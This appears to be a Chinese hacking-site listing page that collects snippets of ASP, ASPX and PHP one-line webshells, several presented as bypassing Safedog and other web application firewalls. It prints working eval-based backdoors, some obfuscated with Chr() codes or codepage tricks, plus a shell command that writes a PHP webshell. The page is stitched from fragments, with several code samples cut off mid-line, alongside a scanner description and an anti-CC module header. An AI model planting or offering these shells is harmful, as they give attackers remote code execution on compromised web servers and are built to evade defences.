ACCESS无select SQL注射

33.jpg

ASP一句话也可以奇葩

       大家都造PHP千变万化,从变量,数组,赋值,运算,函数等。。。没有一样不奇葩的!所以常说PHP的木马永远杀不干净。

        但是asp就悲剧了,它的脚本VBS用法很死板,不像PHP语法各种灵活和奇葩,不过别忘了asp是可以自定义脚本的,如果改成Javascript脚本来执行代码,也能像PHP木马一样奇葩

下面分享一下偶的一匹悍马
<%@LANGUAGE="javascript"%>
<%_()(_(!-''));function _(__){if(__){return Request('_')+''}else{return  eval
}}
%>

asp过狗一句话

<%
i=(Chr(-12590))
love=(Chr(-20306))
you=(Chr(-15133))
OK=i&love&you
CNM=Request(OK)
eVal CNM 'pass:我爱你
%>

asp过狗一句话中文版的哦

推荐个扫 webshell后门 webshell木马 一句话的asp程序

功能说明:
1.能查找后缀名为asp,asa,cdx,cer,aspx等木马
  如果目录下文件过多,容易脚本超时。

2.能查找IIS解析漏洞的文件,这些文件不一定是木马,需要手动查看
  比如"D:\WEBROOT\website\hack.asp\a.gif"或
  "D:\WEBROOT\website\hack.asp;.gif"一类的文件能查到

过安全狗asp一句话

过安全狗asp一句话

-5kik <%@codepage=65000%>
<%r+k-es+k-p+k-on+k-se.co+k-d+k-e+k-p+k-age=936:e+k-v+k-a+k-l r+k-e+k-q+k-u+k-e+k-s+k-t("5kik")%>

dos命令下写webshell语句

linux:echo -e “<[email protected](\\$_POST[“c”]);?>” > webshell.cc.php 会再同目录下生成webshell.cc.php一句话 密码:c

过各种waf墙aspx一句话

过各种waf墙aspx一句话

<script runat="server" language="JScript">
function exs(str) {
	var q = "u";
	var w = "afe";

过各种waf墙asp一句话

过各种waf墙asp一句话

<%
Function Writesource(str)
	Response.write(str)
End Function
Function cd(ByVal s, ByVal key)
    For i = 1 To 

一句话asp木马的变形与免杀处理

    Sub unlockPost()  

  Dim id,replyid,rs,posttable  

  id=Request("id")  

  replyid=Request("replyid")  

  If Not IsNumeric(id) or id="" Then  


ASP防御CC攻击模块

<%
' Asp 防御CC攻击模块 (Anti-CC)
' Author: Nuclear'Atk
' Creation Date: 2011-12-24 11:55:44
' Last Updated: 2012-6-13 10:13:20
&#